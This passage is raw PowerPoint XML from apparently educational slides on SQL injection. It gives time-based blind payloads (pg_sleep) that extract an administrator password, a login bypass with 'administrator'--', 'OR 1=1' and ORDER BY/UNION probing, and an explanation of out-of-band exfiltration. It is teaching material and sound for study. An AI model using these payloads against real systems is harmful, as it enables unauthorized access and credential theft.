              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:: ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>|| (SELECT SLEEP(10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>))—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>1.Confirm that parameter is vulnerable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>paylaod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>:' || (SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10))--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>		' || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>2.Confirm that users table exist on database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	' || (select case when (1=1) then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10) else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(-1) end)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	' || (select case when (username='administrator') then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10) else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(-1) end from users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>3.Enumerating password length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	payload: ' || (select case when (username='administrator' and LENGTH(password)&gt;1) then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10) else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(-1) end from users)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>4.Find password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	payload: ' || (select case when (username='administrator' and substring(password,1,1)='a') then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(10) else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>(-1) end from users)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2747919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GB" b="1" u="sng" dirty="0"/>
              <a:t>Exploiting blind SQL injection using out-of-band (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>What is OAST security testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Out-of-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>application security testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> (OAST) uses external servers to see otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>invisible vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. It was introduced to further improve the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>dynamic application security testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>) model. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> was a pioneer in OAST with Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>Collaborator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. This added OAST capabilities to Burp Suite - making the method more readily accessible.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t>What is out of band?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>It means that you send an attack payload that causes an interaction with external system that you have full control of. And since you have full control of with this system when you running your attack you can see the response that you triggered and therefore you know that you’ve successfully exploit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Compared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>with traditional SQL Injection, outcome of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>exfiltrationis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>indirectly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> from targeted system instead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>it sends through another outbound channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The channel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>can be either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>HTTP or DNS channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. The results of OOB SQL injection can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>be captured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>through proxy or listening server. Figure 2 shows the flow of the OOB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.academia.edu/41117452/A_Study_of_Out-of-Band_Structured_Query_Language_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>https://portswigger.net/burp/documentation/desktop/tools/collaborator-client</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37868644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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Jj</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>j</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0978" y="0"/>
            <a:ext cx="8371584" cy="2982837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3848669" cy="405338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GB" dirty="0"/>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>three</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> success factors of OOB SQL Injection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Firstly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, database system accepts and processes malicious SQL query without proper sanitization control at web application level. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, the database system allowed to communicate on public network (either DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>orHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> protocol). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Lastly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, listening server is required to capture the information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>exfiltratedfrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> database system</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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4059" y="2860672"/>
            <a:ext cx="7479242" cy="4356840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10772676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42681754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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The application doesn't implement any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>defenses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>injection attacks, so an attacker can construct an attack like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://insecure-website.com/products?category=Gifts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>'--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>This results in the SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	SELECT * FROM products WHERE category = 'Gifts'--' AND released = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Going further, an attacker can cause the application to display all the products in any category, including categories that they don't know about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://insecure-website.com/products?category=Gifts'+OR+1=1-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>since 1=1 is always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check response:    ‘--      |   #--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0"/>
              <a:t>Subverting application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>logic/Login form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Here, an attacker can log in as any user without a password simply by using the SQL comment sequence -- to remove the password check from the WHERE clause of the query. For example, submitting the username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>administrator'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>and a blank password results in the following query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>* FROM users WHERE username = 'administrator'--' AND password = ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22717023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GB" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Retrieving data from other database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>tables/Union attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For a UNION query to work, two key requirements must be met:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The individual queries must return the same number of columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>data types in each column must be compatible between the individual queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>How many columns are being returned from the original query?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Which columns returned from the original query are of a suitable data type to hold the results from the injected query?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>are two effective methods to determine how many columns are being returned from the original query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>first method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>involves injecting a series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>clauses and incrementing the specified column index until an error occurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>' ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29002959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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The application might actually return the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>database error </a:t>
            </a:r>
            <a:r>
